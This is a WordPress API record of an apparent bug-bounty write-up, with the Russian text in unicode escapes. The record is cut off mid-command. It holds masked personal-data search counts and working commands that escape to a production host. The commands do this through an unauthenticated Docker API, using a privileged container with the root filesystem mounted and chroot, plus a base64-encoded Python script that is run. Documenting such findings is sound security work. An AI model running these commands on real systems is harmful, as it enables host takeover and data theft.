&#171;Adapter&#187;, &#171;id&#187;: &#171;adapter.2&#187;, &#171;nam\u00a0=== \u0424\u0410\u041c\u0418\u041b\u0418\u042f OR \u0424\u0418\u041e OR SURNAME: 10000 hits ===\u00a0 [masked]=== \u0414\u0410\u0422\u0410 \u0420\u041e\u0416\u0414\u0415\u041d\u0418\u042f OR BIRTHDAY OR BIRTHDATE: 10000 hits ===\u00a0 [masked]=== \u0417\u0410\u0420\u041f\u041b\u0410\u0422\u0410 OR SALARY OR \u041e\u041a\u041b\u0410\u0414: 43 hits ===\u00a0 [masked]\u0411\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u043d\u0430 \u0445\u043e\u0441\u0442 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a Docker API \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440 \u0441 host mount, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442\u0441\u044f \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0445\u043e\u0441\u0442\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e chroot:$ echo &#171;X-BugBounty Bughunter &#8212; DOCKER RCE&#187;$ docker run &#8212;rm &#8212;net=host python:3.11-alpine sh -c &#171;echo aW1wb3J0IHVybGxpYi5yZXF1ZXN0LCBqc29uCgpBUEkgPSAiaHR0cDovLz[masked]| base64 -d &gt; \/tmp\/s.py &amp;&amp; python3 \/tmp\/s.py&#187;=== RUNNING CONTAINERS ===\u00a0 76314479fc85 [&#8216;\/pushgateway&#8217;] prom\/pushgateway running\u00a0 5ca3556e205b [&#8216;\/grafana-container&#8217;] grafana\/grafana running\u00a0 5c46d78fb40c [&#8216;\/prometheus&#8217;] prom\/prometheus running\u00a0 d04022e41e54 [&#8216;\/portainer&#8217;] portainer\/portainer running=== EXEC IN \/pushgateway (76314479fc85) ===Exec ID: ba5bebe6b7b4a31ebff74cef6f899e91c335c2c181e7e3f5442def7b0866a02dOUTPUT:$uid=65534(nobody) gid=65534(nobody)=== CREATE CONTAINER WITH HOST MOUNT ===Created: eaf154407262$ docker -H tcp:\/\/10.50.100.90:2375 run &#8212;rm &#8212;pid=host &#8212;privileged &#8212;net=host -v \/:\/host alpine chroot \/host sh -c &#171;hostname &amp;&amp; id &amp;&amp; whoami &amp;&amp; cat \/etc\/os-release | head -3 &amp;&amp; echo &#8212; &amp;&amp; uname -a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-484555","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/484555","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=484555"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/484555\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=484555"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=484555"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=484555"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}